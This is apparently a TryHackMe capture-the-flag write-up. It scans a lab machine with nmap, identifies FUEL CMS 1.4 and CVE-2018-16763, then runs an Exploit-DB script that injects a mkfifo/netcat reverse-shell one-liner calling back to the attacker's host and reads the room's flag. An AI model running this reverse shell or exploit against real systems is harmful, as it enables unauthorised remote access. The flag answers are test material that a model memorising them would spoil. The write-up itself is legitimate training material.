[THM-WriteUp] Vulnerability Capstone
Task 2: Exploit the Machine (Flag Submission)
What is the name of the application running on the vulnerable machine?
First, run nmap.
root@ip-10-10-163-137:~# nmap -A 10.10.215.220
Starting Nmap 7.60 ( https://nmap.org ) at 2024-04-12 14:48 BST
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for ip-10-10-215-220.eu-west-1.compute.internal (10.10.215.220)
Host is up (0.00030s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Welcome to FUEL CMS
MAC Address: 02:71:B3:D9:61:29 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=4/12%OT=22%CT=1%CU=39888%PV=Y%DS=1%DC=D%G=Y%M=0271B3%T
OS:M=66193BAC%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M23
OS:01ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)
OS:WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=
OS:F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N
OS:)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.30 ms ip-10-10-215-220.eu-west-1.compute.internal (10.10.215.220)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.68 seconds
Answer
FUEL CMS
What is the version number of this application?
The nmap output does not seem to show the version.
Since it looks like a web application, open it in a browser for now.
Answer
1.4
What is the number of the CVE that allows an attacker to remotely execute code on this application?
Search the well-known Exploit-DB.
Answer
CVE-2018-16763
What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.
Use the exploit above as-is.
Note: start a netcat listener beforehand.
root@ip-10-10-163-137:~# nc -lvp 4444
root@ip-10-10-163-137:~# python3 50477.py -u http://10.10.215.220
[+]Connecting...
Enter Command $rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.163.137 4444 >/tmp/f
Got a reverse shell.
root@ip-10-10-163-137:~# nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from ip-10-10-215-220.eu-west-1.compute.internal 58230 received!
/bin/sh: 0: can't access tty; job control turned off
$ pwd
/var/www/html/fuelcms
$ cd /home/ubuntu
$ pwd
/home/ubuntu
$ ls
flag.txt
$ cat flag.txt
THM{ACKME_BLOG_HACKED}
Answer
THM{ACKME_BLOG_HACKED}